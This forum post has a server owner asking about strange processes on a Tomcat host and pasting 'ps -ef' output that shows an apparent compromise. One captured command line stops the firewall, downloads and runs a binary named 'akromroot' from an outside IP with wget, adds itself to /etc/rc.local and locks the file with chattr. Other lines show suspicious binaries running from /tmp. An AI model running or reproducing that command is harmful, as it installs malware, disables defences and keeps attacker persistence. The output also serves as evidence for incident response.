Hi,
I have tomcat running on my server behind httpd. I have used proxy pass 80 to 8080. When I run ps -ef | grep tomcat, the below is the output. I am not sure what all these processes are. Can anyone please help me?
Thanks,
Sub
tomcat 5733 49851 0 Apr11 ? 00:00:00 /bin/bash /tmp/3 > /dev/null 9>&1 &
tomcat 8404 62257 0 11:41 ? 00:00:00 sleep 60
root 8420 1407 0 11:41 ? 00:00:00 sshd: tomcat [priv]
tomcat 8456 8420 0 11:41 ? 00:00:00 sshd: tomcat@pts/0
tomcat 8457 8456 0 11:41 pts/0 00:00:00 -bash
tomcat 8662 59836 0 11:41 ? 00:00:00 sleep 60
tomcat 8750 60478 0 11:41 ? 00:00:00 sleep 60
tomcat 8857 49388 0 11:41 ? 00:00:00 sh -c killall /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c
http://122.224.52.75:9988/akromroot;chmod 777 akromroot;./akromroot;echo "cd /tmp/">>/etc/rc.local;echo "./akromroot&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;chattr +i akromroot;chattr +i /tmp/akromroot;
tomcat 8869 8857 0 11:41 ? 00:00:00 wget -c
http://122.224.52.75:9988/akromroot
tomcat 8870 8457 1 11:41 pts/0 00:00:00 ps -ef
tomcat 8871 8457 0 11:41 pts/0 00:00:00 grep tomcat
tomcat 16053 1 0 Apr11 ? 00:00:21 /tmp/iuk.6 > /dev/null 2>&1 &
tomcat 26178 1 0 Apr11 ? 00:00:00 /usr/local/apache-tomcat-7.0.59/bin/freeBSD /usr/local/apache-tomcat-7.0.59/bin/freeBSD 1
tomcat 26322 1 0 00:19 ? 00:01:34 ./da &
tomcat 26326 49851 0 Apr11 ? 00:00:03 ./ruofeng &
tomcat 26373 49851 0 Apr11 ? 00:00:03 ./ruofeng &
tomcat 37635 64579 0 Apr11 ? 00:00:00 cp /usr/bin/wget .
tomcat 41036 1 0 Apr10 ? 00:00:59 /tmp/.lz1428645679
tomcat 41383 64469 0 Apr11 ? 00:00:00 /bin/bash ./2 &
tomcat 42081 64469 0 Apr11 ? 00:00:00 cp /usr/bin/wget .
tomcat 42749 5733 0 Apr11 ? 00:00:00 /bin/bash /tmp/3 > /dev/null 9>&1 &
tomcat 43412 5733 0 Apr11 ? 00:00:00 chmod 755 /etc/aa
tomcat 45956 1 97 Apr11 ? 20:10:20 /tmp/dage > /dev/null 9>&1 &
tomcat 45957 45956 0 Apr11 ? 00:00:00 /tmp/dage > /dev/null 9>&1 &
tomcat 45958 45957 0 Apr11 ? 00:00:09 /tmp/dage > /dev/null 9>&1 &
tomcat 46067 1 96 Apr11 ? 20:09:57 /tmp/dage > /dev/null 9>&1 &
tomcat 46068 46067 0 Apr11 ? 00:00:00 /tmp/dage > /dev/null 9>&1 &
tomcat 46069 46068 0 Apr11 ? 00:00:10 /tmp/dage > /dev/null 9>&1 &
tomcat 49388 1 0 Apr10 ? 00:15:30 /tmp/SettingMk > /dev/null 2>&1 &
tomcat 49851 1 0 Apr10 ? 00:02:15 /usr/bin/java -Djava.util.logging.config.file=/usr/local/apache-tomcat-7.0.59/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.endorsed.dirs=/usr/local/apache-tomcat-7.0.59/endorsed -classpath /usr/local/apache-tomcat-7.0.59/bin/bootstrap.jar:/usr/local/apache-tomcat-7.0.59/bin/tomcat-juli.jar -Dcatalina.base=/usr/local/apache-tomcat-7.0.59 -Dcatalina.home=/usr/local/apache-tomcat-7.0.59 -Djava.io.tmpdir=/usr/local/apache-tomcat-7.0.59/temp org.apache.catalina.startup.Bootstrap start
tomcat 59249 1 0 Apr10 ? 00:00:42 ./wraiuk.6 &
tomcat 59836 49851 0 Apr11 ? 00:00:01 /bin/bash ./1 &
tomcat 60478 49851 0 Apr11 ? 00:00:01 /bin/bash ./1 &
tomcat 62257 49851 0 Apr11 ? 00:00:01 /bin/bash ./1 &
tomcat 63958 64299 0 Apr11 ? 00:00:00 chmod 755 /etc/mm
tomcat 64299 49851 0 Apr11 ? 00:00:00 /bin/bash ./2
tomcat 64343 1 6 Apr11 ? 01:36:31 /tmp/dage > /dev/null 9>&1 &
tomcat 64344 64343 0 Apr11 ? 00:00:00 [dage] <defunct>
tomcat 64345 1 0 Apr11 ? 00:00:12 /tmp/dage > /dev/null 9>&1 &
tomcat 64469 49851 0 Apr11 ? 00:00:00 /bin/bash ./2 &
tomcat 64579 49851 0 Apr11 ? 00:00:00 /bin/bash ./2 &